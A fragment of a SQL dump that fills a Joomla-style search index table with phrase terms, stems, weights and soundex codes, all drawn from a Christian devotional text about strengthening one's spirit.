(297784, 'matthew 4 4', 'matthew 4 4', 0, 1, 1.3667, 'M300', 1, '*'),
(297785, 'meditate on god\'s', 'medit on god', 0, 1, 1.5667, 'M35232', 1, '*'),
(297786, 'memorise', 'memoris', 0, 0, 0.5333, 'M620', 1, '*'),
(297787, 'memorise the', 'memoris the', 0, 1, 1.4, 'M623', 1, '*'),
(297788, 'memorise the word', 'memoris the word', 0, 1, 1.5667, 'M62363', 1, '*'),
(297789, 'men made', 'men made', 0, 1, 1.2667, 'M300', 1, '*'),
(297790, 'men made perfect', 'men made perfect', 0, 1, 1.5333, 'M316123', 1, '*'),
(297791, 'men with stronger', 'men with stronger', 0, 1, 1.5667, 'M3236526', 1, '*'),
(297792, 'merely', 'mere', 0, 0, 0.4, 'M640', 1, '*'),
(297793, 'merely physical', 'mere physical', 0, 1, 1.5, 'M64124', 1, '*'),
(297794, 'merely physical occurrences', 'mere physical occurrences', 0, 1, 1.9, 'M641242652', 1, '*'),
(297795, 'miss', 'miss', 0, 0, 0.2667, 'M200', 3, '*'),
(297796, 'miss god', 'miss god', 0, 1, 1.2667, 'M230', 1, '*'),
(297797, 'miss god in', 'miss god in', 0, 1, 1.3667, 'M235', 1, '*'),
(297798, 'more emotionally', 'more emotionally', 0, 1, 1.5333, 'M65354', 1, '*'),
(297799, 'more emotionally based', 'more emotionally based', 0, 1, 1.7333, 'M65354123', 1, '*'),
(297800, 'more influential', 'more influential', 0, 1, 1.5333, 'M6514534', 1, '*'),
(297801, 'more influential your', 'more influential your', 0, 1, 1.7, 'M65145346', 1, '*'),
(297802, 'more than a', 'more than a', 0, 1, 1.3667, 'M635', 1, '*'),
(297803, 'most holy', 'most holy', 0, 1, 1.3, 'M234', 1, '*'),
(297804, 'most holy faith', 'most holy faith', 0, 1, 1.5, 'M23413', 1, '*'),
(297805, 'mouth of god.”\'”', 'mouth of god.”', 0, 1, 1.5333, 'M3123', 1, '*'),
(297806, 'move of', 'move of', 0, 1, 1.2333, 'M100', 1, '*'),
(297807, 'move of god', 'move of god', 0, 1, 1.3667, 'M123', 1, '*'),
(297808, 'must be stronger', 'must be stronger', 0, 1, 1.5333, 'M231236526', 1, '*'),
(297809, 'must take time', 'must take time', 0, 1, 1.4667, 'M23235', 1, '*'),
(297810, 'nature there', 'natur there', 0, 1, 1.4, 'N3636', 1, '*'),
(297811, 'nature there is', 'natur there is', 0, 1, 1.5, 'N36362', 1, '*'),
(297812, 'needs god\'s', 'need god', 0, 1, 1.3667, 'N3232', 1, '*'),
(297813, 'needs god\'s word', 'need god word', 0, 1, 1.5333, 'N323263', 1, '*'),
(297814, 'neglect', 'neglect', 0, 0, 0.4667, 'N2423', 1, '*'),
(297815, 'neglect the', 'neglect the', 0, 1, 1.3667, 'N2423', 1, '*'),
(297816, 'neglect the spirit', 'neglect the spirit', 0, 1, 1.6, 'N24232163', 1, '*'),
(297817, 'not emotional', 'not emotional', 0, 1, 1.4333, 'N35354', 1, '*'),
(297818, 'not emotional god', 'not emotional god', 0, 1, 1.5667, 'N3535423', 1, '*'),
(297819, 'not live', 'not live', 0, 1, 1.2667, 'N341', 1, '*'),
(297820, 'not live by', 'not live by', 0, 1, 1.3667, 'N341', 1, '*'),
(297821, 'obtain those', 'obtain those', 0, 1, 1.4, 'O13532', 1, '*'),
(297822, 'obtain those two', 'obtain those two', 0, 1, 1.5333, 'O135323', 1, '*'),
(297823, 'occurrences', 'occurr', 0, 0, 0.7333, 'O2652', 1, '*'),
(297824, 'occurrences such', 'occurr such', 0, 1, 1.5333, 'O2652', 1, '*'),
(297825, 'occurrences such are', 'occurr such are', 0, 1, 1.6667, 'O26526', 1, '*'),
(297826, 'of all spirits', 'of all spirits', 0, 1, 1.4667, 'O1421632', 1, '*'),
(297827, 'of difficult', 'of difficult', 0, 1, 1.4, 'O131243', 1, '*'),
(297828, 'of difficult times', 'of difficult times', 0, 1, 1.6, 'O13124352', 1, '*'),
(297829, 'of god.”\'”', 'of god.”', 0, 1, 1.3333, 'O123', 1, '*'),
(297830, 'of god.”\'” your', 'of god.” your', 0, 1, 1.5, 'O1236', 1, '*'),
(297831, 'of just men', 'of just men', 0, 1, 1.3667, 'O1235', 1, '*'),
(297832, 'of reasoning', 'of reasoning', 0, 1, 1.4, 'O16252', 1, '*'),
(297833, 'of reasoning will', 'of reasoning will', 0, 1, 1.5667, 'O162524', 1, '*'),
(297834, 'of you that', 'of you that', 0, 1, 1.3667, 'O130', 1, '*'),
(297835, 'of your spirit', 'of your spirit', 0, 1, 1.4667, 'O162163', 1, '*'),
(297836, 'on 2', 'on 2', 0, 1, 1.1333, 'O500', 1, '*'),
(297837, 'on 2 feed', 'on 2 feed', 0, 1, 1.3, 'O513', 1, '*'),
(297838, 'on god\'s word', 'on god word', 0, 1, 1.4333, 'O523263', 1, '*'),
(297839, 'on his finger', 'on his finger', 0, 1, 1.4333, 'O521526', 1, '*'),
(297840, 'on his throne', 'on his throne', 0, 1, 1.4333, 'O52365', 1, '*'),
(297841, 'on the scripture', 'on the scripture', 0, 1, 1.5333, 'O5326136', 1, '*'),
(297842, 'on the word', 'on the word', 0, 1, 1.3667, 'O5363', 2, '*'),
(297843, 'on your most', 'on your most', 0, 1, 1.4, 'O56523', 1, '*'),
(297844, 'only a well-nourished', 'onli a well-nourished', 0, 1, 1.7, 'O545623', 1, '*'),
(297845, 'open up', 'open up', 0, 1, 1.2333, 'O151', 1, '*'),
(297846, 'open up to', 'open up to', 0, 1, 1.3333, 'O1513', 1, '*'),
(297847, 'opened to', 'open to', 0, 1, 1.3, 'O153', 1, '*'),
(297848, 'opened to the', 'open to the', 0, 1, 1.4333, 'O153', 1, '*'),
(297849, 'or excellent', 'or excellent', 0, 1, 1.4, 'O62453', 1, '*'),
(297850, 'or excellent the', 'or excellent the', 0, 1, 1.5333, 'O62453', 1, '*'),
(297851, 'other areas', 'other areas', 0, 1, 1.3667, 'O362', 1, '*'),
(297852, 'other areas of', 'other areas of', 0, 1, 1.4667, 'O3621', 1, '*'),
(297853, 'other aspects', 'other aspects', 0, 1, 1.4333, 'O3621232', 1, '*'),
(297854, 'other aspects of', 'other aspects of', 0, 1, 1.5333, 'O36212321', 1, '*'),
(297855, 'other men', 'other men', 0, 1, 1.3, 'O365', 1, '*'),
(297856, 'other men with', 'other men with', 0, 1, 1.4667, 'O3653', 1, '*'),
(297857, 'others are', 'other are', 0, 1, 1.3333, 'O3626', 1, '*'),
(297858, 'others are just', 'other are just', 0, 1, 1.5, 'O362623', 1, '*'),
(297859, 'out the strength', 'out the strength', 0, 1, 1.5333, 'O3236523', 1, '*'),
(297860, 'over and lead', 'over and lead', 0, 1, 1.4333, 'O165343', 1, '*'),
(297861, 'part of you', 'part of you', 0, 1, 1.3667, 'P631', 1, '*'),
(297862, 'parts but', 'part but', 0, 1, 1.3, 'P63213', 1, '*'),
(297863, 'parts but the', 'part but the', 0, 1, 1.4333, 'P63213', 1, '*'),
(297864, 'parts spirit', 'part spirit', 0, 1, 1.4, 'P632163', 1, '*'),
(297865, 'parts spirit soul', 'part spirit soul', 0, 1, 1.5667, 'P63216324', 1, '*'),
(297866, 'people others', 'peopl others', 0, 1, 1.4333, 'P4362', 1, '*'),
(297867, 'people others are', 'peopl others are', 0, 1, 1.5667, 'P43626', 1, '*'),
(297868, 'perfect heb', 'perfect heb', 0, 1, 1.3667, 'P61231', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(297869, 'perfect heb 12', 'perfect heb 12', 0, 1, 1.4667, 'P61231', 1, '*'),
(297870, 'perversions', 'pervers', 0, 0, 0.7333, 'P616252', 1, '*'),
(297871, 'perversions 6', 'pervers 6', 0, 1, 1.4333, 'P616252', 1, '*'),
(297872, 'perversions 6 meditate', 'pervers 6 meditate', 0, 1, 1.7333, 'P61625253', 1, '*'),
(297873, 'physical occurrences', 'physic occurrences', 0, 1, 1.6667, 'P242652', 1, '*'),
(297874, 'physical occurrences such', 'physic occurrences such', 0, 1, 1.8333, 'P242652', 1, '*'),
(297875, 'placed on his', 'place on his', 0, 1, 1.4333, 'P42352', 1, '*'),
(297876, 'plan is', 'plan is', 0, 1, 1.2333, 'P452', 1, '*'),
(297877, 'plan is for', 'plan is for', 0, 1, 1.3667, 'P45216', 1, '*'),
(297878, 'pollutions', 'pollut', 0, 0, 0.6667, 'P4352', 1, '*'),
(297879, 'pollutions and', 'pollut and', 0, 1, 1.4667, 'P435253', 1, '*'),
(297880, 'pollutions and perversions', 'pollut and perversions', 0, 1, 1.8667, 'P4352531616252', 1, '*'),
(297881, 'potency', 'potenc', 0, 0, 0.4667, 'P352', 1, '*'),
(297882, 'potency in', 'potenc in', 0, 1, 1.3333, 'P3525', 1, '*'),
(297883, 'potency in life', 'potenc in life', 0, 1, 1.5, 'P352541', 1, '*'),
(297884, 'precious and', 'preciou and', 0, 1, 1.4, 'P6253', 1, '*'),
(297885, 'precious and sacred', 'preciou and sacred', 0, 1, 1.6333, 'P6253263', 1, '*'),
(297886, 'prioritize', 'priorit', 0, 0, 0.6667, 'P632', 1, '*'),
(297887, 'prioritize developing', 'priorit developing', 0, 1, 1.7, 'P632314152', 1, '*'),
(297888, 'prioritize developing your', 'priorit developing your', 0, 1, 1.8667, 'P6323141526', 1, '*'),
(297889, 'pro 18', 'pro 18', 0, 1, 1.2, 'P600', 1, '*'),
(297890, 'pro 18 14', 'pro 18 14', 0, 1, 1.3, 'P600', 1, '*'),
(297891, 'proceeds', 'proce', 0, 0, 0.5333, 'P6232', 1, '*'),
(297892, 'proceeds from', 'proce from', 0, 1, 1.4333, 'P6232165', 1, '*'),
(297893, 'proceeds from the', 'proce from the', 0, 1, 1.5667, 'P62321653', 1, '*'),
(297894, 'protect your spirit', 'protect your spirit', 0, 1, 1.6333, 'P632362163', 1, '*'),
(297895, 'proverbs 18', 'proverb 18', 0, 1, 1.3667, 'P61612', 1, '*'),
(297896, 'proverbs 18 14', 'proverb 18 14', 0, 1, 1.4667, 'P61612', 1, '*'),
(297897, 'read the word', 'read the word', 0, 1, 1.4333, 'R363', 1, '*'),
(297898, 'real man', 'real man', 0, 1, 1.2667, 'R450', 1, '*'),
(297899, 'real man in', 'real man in', 0, 1, 1.3667, 'R450', 1, '*'),
(297900, 'real you', 'real you', 0, 1, 1.2667, 'R400', 1, '*'),
(297901, 'real you every', 'real you every', 0, 1, 1.4667, 'R416', 1, '*'),
(297902, 'reasoning', 'reason', 0, 0, 0.6, 'R252', 1, '*'),
(297903, 'reasoning will', 'reason will', 0, 1, 1.4667, 'R2524', 1, '*'),
(297904, 'reasoning will and', 'reason will and', 0, 1, 1.6, 'R252453', 1, '*'),
(297905, 'recognize that', 'recogn that', 0, 1, 1.4667, 'R2523', 1, '*'),
(297906, 'recognize that man', 'recogn that man', 0, 1, 1.6, 'R25235', 1, '*'),
(297907, 'reduce your', 'reduc your', 0, 1, 1.3667, 'R326', 1, '*'),
(297908, 'reduce your potency', 'reduc your potency', 0, 1, 1.6333, 'R3261352', 1, '*'),
(297909, 'represent authority', 'repres authority', 0, 1, 1.6333, 'R1625363', 1, '*'),
(297910, 'represent authority and', 'repres authority and', 0, 1, 1.7667, 'R162536353', 1, '*'),
(297911, 'respectively', 'respect', 0, 0, 0.8, 'R212314', 1, '*'),
(297912, 'respectively these', 'respect these', 0, 1, 1.6, 'R21231432', 1, '*'),
(297913, 'respectively these represent', 'respect these represent', 0, 1, 1.9333, 'R21231432616253', 1, '*'),
(297914, 'revolusola', 'revolusola', 0, 0, 0.6667, 'R1424', 1, '*'),
(297915, 'revolusola areogun', 'revolusola areogun', 0, 1, 1.6, 'R1424625', 1, '*'),
(297916, 'ring', 'ring', 0, 0, 0.2667, 'R520', 1, '*'),
(297917, 'ring and', 'ring and', 0, 1, 1.2667, 'R5253', 1, '*'),
(297918, 'ring and crown', 'ring and crown', 0, 1, 1.4667, 'R5253265', 1, '*'),
(297919, 'rise up stronger', 'rise up stronger', 0, 1, 1.5333, 'R21236526', 1, '*'),
(297920, 'robust', 'robust', 0, 0, 0.4, 'R123', 1, '*'),
(297921, 'robust 3', 'robust 3', 0, 1, 1.2667, 'R123', 1, '*'),
(297922, 'robust 3 exercise', 'robust 3 exercise', 0, 1, 1.5667, 'R123262', 1, '*'),
(297923, 's heart 20', 's heart 20', 0, 1, 1.3333, 'S630', 1, '*'),
(297924, 'sacred time', 'sacr time', 0, 1, 1.3667, 'S635', 1, '*'),
(297925, 'sacred time to', 'sacr time to', 0, 1, 1.4667, 'S6353', 1, '*'),
(297926, 'said \'it', 'said it', 0, 1, 1.2667, 'S300', 1, '*'),
(297927, 'said \'it is', 'said it is', 0, 1, 1.3667, 'S320', 1, '*'),
(297928, 'sap', 'sap', 0, 0, 0.2, 'S100', 1, '*'),
(297929, 'sap out', 'sap out', 0, 1, 1.2333, 'S130', 1, '*'),
(297930, 'sap out the', 'sap out the', 0, 1, 1.3667, 'S130', 1, '*'),
(297931, 'sat', 'sat', 0, 0, 0.2, 'S300', 1, '*'),
(297932, 'sat on', 'sat on', 0, 1, 1.2, 'S350', 1, '*'),
(297933, 'sat on his', 'sat on his', 0, 1, 1.3333, 'S352', 1, '*'),
(297934, 'says “but he', 'sai “but he', 0, 1, 1.4, 'S130', 1, '*'),
(297935, 'says “but you', 'sai “but you', 0, 1, 1.4333, 'S130', 1, '*'),
(297936, 'says “the spirit', 'sai “the spirit', 0, 1, 1.5333, 'S32163', 1, '*'),
(297937, 'scripture says', 'scriptur says', 0, 1, 1.4667, 'S61362', 1, '*'),
(297938, 'scripture says “the', 'scriptur says “the', 0, 1, 1.6333, 'S613623', 1, '*'),
(297939, 'seat', 'seat', 0, 0, 0.2667, 'S300', 1, '*'),
(297940, 'seat of', 'seat of', 0, 1, 1.2333, 'S310', 1, '*'),
(297941, 'seat of reasoning', 'seat of reasoning', 0, 1, 1.5667, 'S316252', 1, '*'),
(297942, 'servant revolusola', 'servant revolusola', 0, 1, 1.6, 'S615361424', 1, '*'),
(297943, 'servant revolusola areogun', 'servant revolusola areogun', 0, 1, 1.8667, 'S615361424625', 1, '*'),
(297944, 'shall not live', 'shall not live', 0, 1, 1.4667, 'S45341', 1, '*'),
(297945, 'sickness but', 'sick but', 0, 1, 1.4, 'S5213', 1, '*'),
(297946, 'sickness but who', 'sick but who', 0, 1, 1.5333, 'S5213', 1, '*'),
(297947, 'side of', 'side of', 0, 1, 1.2333, 'S310', 1, '*'),
(297948, 'side of your', 'side of your', 0, 1, 1.4, 'S316', 1, '*'),
(297949, 'soak', 'soak', 0, 0, 0.2667, 'S000', 1, '*'),
(297950, 'soak it', 'soak it', 0, 1, 1.2333, 'S300', 1, '*'),
(297951, 'soak it in', 'soak it in', 0, 1, 1.3333, 'S350', 1, '*'),
(297952, 'soul and', 'soul and', 0, 1, 1.2667, 'S453', 1, '*'),
(297953, 'soul and body', 'soul and body', 0, 1, 1.4333, 'S45313', 1, '*'),
(297954, 'soul and lives', 'soul and lives', 0, 1, 1.4667, 'S453412', 1, '*'),
(297955, 'soul and your', 'soul and your', 0, 1, 1.4333, 'S4536', 1, '*'),
(297956, 'soul effectively', 'soul effectively', 0, 1, 1.5333, 'S412314', 1, '*'),
(297957, 'soul effectively it', 'soul effectively it', 0, 1, 1.6333, 'S4123143', 1, '*'),
(297958, 'soul god\'s', 'soul god', 0, 1, 1.3333, 'S4232', 1, '*'),
(297959, 'soul god\'s plan', 'soul god plan', 0, 1, 1.5, 'S4232145', 1, '*'),
(297960, 'soul is', 'soul is', 0, 1, 1.2333, 'S420', 1, '*'),
(297961, 'soul is your', 'soul is your', 0, 1, 1.4, 'S426', 1, '*'),
(297962, 'soulish', 'soulish', 0, 0, 0.4667, 'S420', 1, '*'),
(297963, 'soulish people', 'soulish people', 0, 1, 1.4667, 'S4214', 1, '*'),
(297964, 'soulish people others', 'soulish people others', 0, 1, 1.7, 'S4214362', 1, '*'),
(297965, 'speak the', 'speak the', 0, 1, 1.3, 'S123', 1, '*'),
(297966, 'speak the word', 'speak the word', 0, 1, 1.4667, 'S12363', 1, '*'),
(297967, 'spend time', 'spend time', 0, 1, 1.3333, 'S1535', 1, '*'),
(297968, 'spend time to', 'spend time to', 0, 1, 1.4333, 'S15353', 1, '*'),
(297969, 'spend to', 'spend to', 0, 1, 1.2667, 'S153', 1, '*'),
(297970, 'spend to develop', 'spend to develop', 0, 1, 1.5333, 'S153141', 1, '*'),
(297971, 'spending time to', 'spend time to', 0, 1, 1.5333, 'S15352353', 1, '*'),
(297972, 'spirit 5', 'spirit 5', 0, 1, 1.2667, 'S163', 1, '*'),
(297973, 'spirit 5 protect', 'spirit 5 protect', 0, 1, 1.5333, 'S16316323', 1, '*'),
(297974, 'spirit and make', 'spirit and make', 0, 1, 1.5, 'S1635352', 1, '*'),
(297975, 'spirit and the', 'spirit and the', 0, 1, 1.4667, 'S16353', 1, '*'),
(297976, 'spirit as a', 'spirit as a', 0, 1, 1.3667, 'S1632', 1, '*'),
(297977, 'spirit can obtain', 'spirit can obtain', 0, 1, 1.5667, 'S16325135', 1, '*'),
(297978, 'spirit cannot', 'spirit cannot', 0, 1, 1.4333, 'S163253', 1, '*'),
(297979, 'spirit cannot lead', 'spirit cannot lead', 0, 1, 1.6, 'S16325343', 1, '*'),
(297980, 'spirit causes', 'spirit causes', 0, 1, 1.4333, 'S1632', 1, '*'),
(297981, 'spirit causes your', 'spirit causes your', 0, 1, 1.6, 'S16326', 1, '*'),
(297982, 'spirit from pollutions', 'spirit from pollutions', 0, 1, 1.7333, 'S16316514352', 1, '*'),
(297983, 'spirit he', 'spirit he', 0, 1, 1.3, 'S163', 1, '*'),
(297984, 'spirit he was', 'spirit he was', 0, 1, 1.4333, 'S1632', 1, '*'),
(297985, 'spirit is that', 'spirit is that', 0, 1, 1.4667, 'S16323', 1, '*'),
(297986, 'spirit is the', 'spirit is the', 0, 1, 1.4333, 'S16323', 1, '*'),
(297987, 'spirit it takes', 'spirit it takes', 0, 1, 1.5, 'S1632', 1, '*'),
(297988, 'spirit man', 'spirit man', 0, 1, 1.3333, 'S1635', 1, '*'),
(297989, 'spirit man alive', 'spirit man alive', 0, 1, 1.5333, 'S163541', 1, '*'),
(297990, 'spirit man and', 'spirit man and', 0, 1, 1.4667, 'S16353', 1, '*'),
(297991, 'spirit man by', 'spirit man by', 0, 1, 1.4333, 'S16351', 1, '*'),
(297992, 'spirit man getting', 'spirit man getting', 0, 1, 1.6, 'S16352352', 1, '*'),
(297993, 'spirit man include', 'spirit man include', 0, 1, 1.6, 'S1635243', 1, '*'),
(297994, 'spirit man is', 'spirit man is', 0, 1, 1.4333, 'S16352', 1, '*'),
(297995, 'spirit man recognize', 'spirit man recognize', 0, 1, 1.6667, 'S16356252', 1, '*'),
(297996, 'spirit man to', 'spirit man to', 0, 1, 1.4333, 'S16353', 1, '*'),
(297997, 'spirit matthew', 'spirit matthew', 0, 1, 1.4667, 'S16353', 1, '*'),
(297998, 'spirit matthew 4', 'spirit matthew 4', 0, 1, 1.5333, 'S16353', 1, '*'),
(297999, 'spirit must', 'spirit must', 0, 1, 1.3667, 'S163523', 1, '*'),
(298000, 'spirit must be', 'spirit must be', 0, 1, 1.4667, 'S1635231', 1, '*'),
(298001, 'spirit needs', 'spirit needs', 0, 1, 1.4, 'S163532', 1, '*'),
(298002, 'spirit needs god\'s', 'spirit needs god', 0, 1, 1.6, 'S16353232', 1, '*'),
(298003, 'spirit of a', 'spirit of a', 0, 1, 1.3667, 'S1631', 1, '*'),
(298004, 'spirit of just', 'spirit of just', 0, 1, 1.4667, 'S163123', 1, '*'),
(298005, 'spirit pro', 'spirit pro', 0, 1, 1.3333, 'S16316', 1, '*'),
(298006, 'spirit pro 18', 'spirit pro 18', 0, 1, 1.4333, 'S16316', 1, '*'),
(298007, 'spirit side', 'spirit side', 0, 1, 1.3667, 'S16323', 1, '*'),
(298008, 'spirit side of', 'spirit side of', 0, 1, 1.4667, 'S163231', 1, '*'),
(298009, 'spirit soul', 'spirit soul', 0, 1, 1.3667, 'S16324', 1, '*'),
(298010, 'spirit soul and', 'spirit soul and', 0, 1, 1.5, 'S1632453', 1, '*'),
(298011, 'spirit spend', 'spirit spend', 0, 1, 1.4, 'S1632153', 1, '*'),
(298012, 'spirit spend time', 'spirit spend time', 0, 1, 1.5667, 'S16321535', 1, '*'),
(298013, 'spirit that has', 'spirit that has', 0, 1, 1.5, 'S1632', 1, '*'),
(298014, 'spirit the stronger', 'spirit the stronger', 0, 1, 1.6333, 'S163236526', 1, '*'),
(298015, 'spirit to sustain', 'spirit to sustain', 0, 1, 1.5667, 'S163235', 1, '*'),
(298016, 'spirit who', 'spirit who', 0, 1, 1.3333, 'S163', 1, '*'),
(298017, 'spirit who has', 'spirit who has', 0, 1, 1.4667, 'S1632', 1, '*'),
(298018, 'spirit will be', 'spirit will be', 0, 1, 1.4667, 'S16341', 1, '*'),
(298019, 'spirit work', 'spirit work', 0, 1, 1.3667, 'S16362', 1, '*'),
(298020, 'spirit work to', 'spirit work to', 0, 1, 1.4667, 'S163623', 1, '*'),
(298021, 'spirit your', 'spirit your', 0, 1, 1.3667, 'S1636', 1, '*'),
(298022, 'spirit your life', 'spirit your life', 0, 1, 1.5333, 'S163641', 1, '*'),
(298023, 'spirit.”', 'spirit.”', 0, 0, 0.5333, 'S163', 1, '*'),
(298024, 'spirit.” praying', 'spirit.” praying', 0, 1, 1.5333, 'S1631652', 1, '*'),
(298025, 'spirit.” praying in', 'spirit.” praying in', 0, 1, 1.6333, 'S16316525', 1, '*'),
(298026, 'spirits god', 'spirit god', 0, 1, 1.3667, 'S16323', 1, '*'),
(298027, 'spirits god he', 'spirit god he', 0, 1, 1.4667, 'S16323', 1, '*'),
(298028, 'spirits the bible', 'spirit the bible', 0, 1, 1.5667, 'S1632314', 1, '*'),
(298029, 'spiritual emotion-led', 'spiritu emotion-led', 0, 1, 1.7, 'S163453543', 1, '*'),
(298030, 'spiritual emotion-led believers', 'spiritu emotion-led believers', 0, 1, 2, 'S16345354314162', 1, '*'),
(298031, 'spiritual life you', 'spiritu life you', 0, 1, 1.6, 'S16341', 1, '*'),
(298032, 'spiritual side', 'spiritu side', 0, 1, 1.4667, 'S163423', 1, '*'),
(298033, 'spiritual side of', 'spiritu side of', 0, 1, 1.5667, 'S1634231', 1, '*'),
(298034, 'spiritual stance', 'spiritu stance', 0, 1, 1.5333, 'S16342352', 1, '*'),
(298035, 'spiritual stance and', 'spiritu stance and', 0, 1, 1.6667, 'S1634235253', 1, '*'),
(298036, 'spiritual steps', 'spiritu steps', 0, 1, 1.5, 'S16342312', 1, '*'),
(298037, 'spiritual steps to', 'spiritu steps to', 0, 1, 1.6, 'S163423123', 1, '*'),
(298038, 'stamina are', 'stamina are', 0, 1, 1.3667, 'S356', 1, '*'),
(298039, 'stamina are what', 'stamina are what', 0, 1, 1.5333, 'S3563', 1, '*'),
(298040, 'stance', 'stanc', 0, 0, 0.4, 'S352', 1, '*'),
(298041, 'stance and', 'stanc and', 0, 1, 1.3333, 'S35253', 1, '*'),
(298042, 'stance and stamina', 'stanc and stamina', 0, 1, 1.6, 'S35253235', 1, '*'),
(298043, 'stand whether', 'stand whether', 0, 1, 1.4333, 'S3536', 1, '*'),
(298044, 'stand whether weak', 'stand whether weak', 0, 1, 1.6, 'S35362', 1, '*'),
(298045, 'step to', 'step to', 0, 1, 1.2333, 'S313', 1, '*'),
(298046, 'step to strengthen', 'step to strengthen', 0, 1, 1.6, 'S3132365235', 1, '*'),
(298047, 'steps to strengthen', 'step to strengthen', 0, 1, 1.6333, 'S31232365235', 1, '*'),
(298048, 'stop being', 'stop being', 0, 1, 1.3333, 'S3152', 1, '*'),
(298049, 'stop being just', 'stop being just', 0, 1, 1.5, 'S31523', 1, '*'),
(298050, 'strength of', 'strength of', 0, 1, 1.3667, 'S365231', 2, '*'),
(298051, 'strength of your', 'strength of your', 0, 1, 1.5333, 'S3652316', 1, '*'),
(298052, 'strengthen', 'strengthen', 0, 0, 0.6667, 'S365235', 1, '*'),
(298053, 'strengthen your', 'strengthen your', 0, 1, 1.5, 'S3652356', 1, '*'),
(298054, 'strengthen your spirit', 'strengthen your spirit', 0, 1, 1.7333, 'S36523562163', 1, '*'),
(298055, 'strengthen your spiritual', 'strengthen your spiritual', 0, 1, 1.8333, 'S365235621634', 1, '*'),
(298056, 'strengthened inyour', 'strengthen inyour', 0, 1, 1.6333, 'S365235356', 1, '*'),
(298057, 'strengthened inyour inner', 'strengthen inyour inner', 0, 1, 1.8333, 'S36523535656', 1, '*'),
(298058, 'strong in', 'strong in', 0, 1, 1.3, 'S36525', 1, '*'),
(298059, 'strong in your', 'strong in your', 0, 1, 1.4667, 'S365256', 1, '*'),
(298060, 'strong or', 'strong or', 0, 1, 1.3, 'S36526', 1, '*'),
(298061, 'strong or excellent', 'strong or excellent', 0, 1, 1.6333, 'S365262453', 1, '*'),
(298062, 'strong spirit', 'strong spirit', 0, 1, 1.4333, 'S3652163', 1, '*'),
(298063, 'strong spirit can', 'strong spirit can', 0, 1, 1.5667, 'S365216325', 1, '*'),
(298064, 'strong spirit he', 'strong spirit he', 0, 1, 1.5333, 'S3652163', 1, '*'),
(298065, 'stronger and', 'stronger and', 0, 1, 1.4, 'S3652653', 1, '*'),
(298066, 'stronger and more', 'stronger and more', 0, 1, 1.5667, 'S365265356', 1, '*'),
(298067, 'stronger like', 'stronger like', 0, 1, 1.4333, 'S3652642', 1, '*'),
(298068, 'stronger like an', 'stronger like an', 0, 1, 1.5333, 'S36526425', 1, '*'),
(298069, 'stronger spirit', 'stronger spirit', 0, 1, 1.5, 'S365262163', 1, '*'),
(298070, 'stronger spirit to', 'stronger spirit to', 0, 1, 1.6, 'S365262163', 1, '*'),
(298071, 'stronger spirits', 'stronger spirits', 0, 1, 1.5333, 'S3652621632', 1, '*'),
(298072, 'stronger spirits the', 'stronger spirits the', 0, 1, 1.6667, 'S36526216323', 1, '*'),
(298073, 'stronger your spirit', 'stronger your spirit', 0, 1, 1.6667, 'S365262163', 1, '*'),
(298074, 'stupid and', 'stupid and', 0, 1, 1.3333, 'S31353', 1, '*'),
(298075, 'stupid and foolish', 'stupid and foolish', 0, 1, 1.6, 'S31353142', 1, '*'),
(298076, 'such are', 'such are', 0, 1, 1.2667, 'S600', 1, '*'),
(298077, 'such are soulish', 'such are soulish', 0, 1, 1.5333, 'S6242', 1, '*'),
(298078, 'survive', 'surviv', 0, 0, 0.4667, 'S610', 2, '*'),
(298079, 'survive open', 'surviv open', 0, 1, 1.4, 'S615', 1, '*'),
(298080, 'survive open up', 'surviv open up', 0, 1, 1.5, 'S6151', 1, '*'),
(298081, 'sustain a', 'sustain a', 0, 1, 1.3, 'S350', 1, '*'),
(298082, 'sustain a man', 'sustain a man', 0, 1, 1.4333, 'S350', 1, '*'),
(298083, 'sustain him', 'sustain him', 0, 1, 1.3667, 'S350', 1, '*'),
(298084, 'sustain him in', 'sustain him in', 0, 1, 1.4667, 'S350', 1, '*'),
(298085, 'take care', 'take care', 0, 1, 1.3, 'T260', 1, '*'),
(298086, 'take care of', 'take care of', 0, 1, 1.4, 'T261', 1, '*'),
(298087, 'take time', 'take time', 0, 1, 1.3, 'T235', 2, '*'),
(298088, 'take time to', 'take time to', 0, 1, 1.4, 'T2353', 1, '*'),
(298089, 'take you over', 'take you over', 0, 1, 1.4333, 'T216', 1, '*'),
(298090, 'takes a', 'take a', 0, 1, 1.2333, 'T200', 1, '*'),
(298091, 'takes a stronger', 'take a stronger', 0, 1, 1.5333, 'T236526', 1, '*'),
(298092, 'talks of the', 'talk of the', 0, 1, 1.4, 'T4213', 1, '*'),
(298093, 'template to', 'templat to', 0, 1, 1.3667, 'T5143', 1, '*'),
(298094, 'template to build', 'templat to build', 0, 1, 1.5667, 'T5143143', 1, '*'),
(298095, 'than a', 'than a', 0, 1, 1.2, 'T500', 2, '*'),
(298096, 'than a body', 'than a body', 0, 1, 1.3667, 'T513', 1, '*'),
(298097, 'than spiritual', 'than spiritual', 0, 1, 1.4667, 'T521634', 1, '*'),
(298098, 'than spiritual emotion-led', 'than spiritual emotion-led', 0, 1, 1.8667, 'T52163453543', 1, '*'),
(298099, 'than your soul', 'than your soul', 0, 1, 1.4667, 'T5624', 1, '*'),
(298100, 'that all other', 'that all other', 0, 1, 1.4667, 'T436', 1, '*'),
(298101, 'that communes', 'that communes', 0, 1, 1.4333, 'T252', 1, '*'),
(298102, 'that communes with', 'that communes with', 0, 1, 1.6, 'T2523', 1, '*'),
(298103, 'that has a', 'that has a', 0, 1, 1.3333, 'T200', 1, '*'),
(298104, 'that he is', 'that he is', 0, 1, 1.3333, 'T200', 1, '*'),
(298105, 'that man has', 'that man has', 0, 1, 1.4, 'T520', 1, '*'),
(298106, 'that part', 'that part', 0, 1, 1.3, 'T163', 1, '*'),
(298107, 'that part of', 'that part of', 0, 1, 1.4, 'T1631', 1, '*'),
(298108, 'that proceeds', 'that proceeds', 0, 1, 1.4333, 'T16232', 1, '*'),
(298109, 'that proceeds from', 'that proceeds from', 0, 1, 1.6, 'T16232165', 1, '*'),
(298110, 'the father of', 'the father of', 0, 1, 1.4333, 'T1361', 1, '*'),
(298111, 'the foundation upon', 'the foundation upon', 0, 1, 1.6333, 'T153515', 1, '*'),
(298112, 'the holy spirit.”', 'the holy spirit.”', 0, 1, 1.5667, 'T42163', 1, '*'),
(298113, 'the leader however', 'the leader however', 0, 1, 1.6, 'T43616', 1, '*'),
(298114, 'the other aspects', 'the other aspects', 0, 1, 1.5667, 'T621232', 1, '*'),
(298115, 'the real man', 'the real man', 0, 1, 1.4, 'T645', 1, '*'),
